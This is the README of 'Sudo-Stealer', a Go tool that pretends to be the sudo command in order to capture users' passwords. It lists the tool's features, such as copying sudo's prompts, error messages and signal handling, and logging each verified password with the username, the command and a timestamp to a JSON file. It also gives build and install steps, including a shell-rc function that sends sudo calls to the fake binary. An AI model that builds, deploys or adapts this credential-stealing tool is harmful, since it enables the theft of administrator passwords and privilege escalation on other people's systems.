Sudo-Stealer is an *nix program for stealing sudo passwords by disguising as the original sudo software. Its capabilities are almost similar to that of the original sudo program as such as displaying the same input messages, error messages like incorrect attempts and also handling of some system signals such as SIGQUIT, SIGINT & SIGTSTP. It verify the password, stores it in json support as well as username, the command that was executed and the execution time in a file for later usage.
It was tested on a linux specifically Kali linux :) but I think it's applicable on any *nix system because of their similarities while using shell or terminal.
Any *nix system with terminal & wget.
Golang 1.18.2 or higher.
If Golang not found. Install Golang with wget
wget https://go.dev/dl/go1.18.x.linux-amd64.tar.gzExtract to /usr/local/go directory/folder
tar -C /usr/local -xzf go1.18.x.linux-amd64.tar.gzSet your GOPATH
export GOPATH=/any folder of your choiceAdd your GO bin directory to PATH
export PATH=$PATH:/usr/local/go/bin But if Golang 1.18.2 or higher is found, then proceed
Download with Git
git clone https://github.com/Genaro-Chris/Sudo-StealerCompile to binary name sudo
cd Sudo-Stealer
go build -o ./sudo .or download pre-compiled binary from here
Find your shell configuration file. It's usually a file in your home directory that ends with rc.
Examples
.bashrc
.cshrc
.zshrcThen add execute permission to the sudo executable
chmod +x /path/to/sudoAdd the following line to the end of your shell configuration file.
sudo() { /path/to/sudo "${@:1}" }- Maximum of 3 wrong password attempts
- Timeouts the superuser session's after 15 minutes
- No need to enter password again after first correct attempt
- Stores correct passwords with their respective commands and the time it was executed
If you have any feedbacks, issues, code improvements of any sort, contributions, or even collaborations on any of your projects.
Please reach out to me at here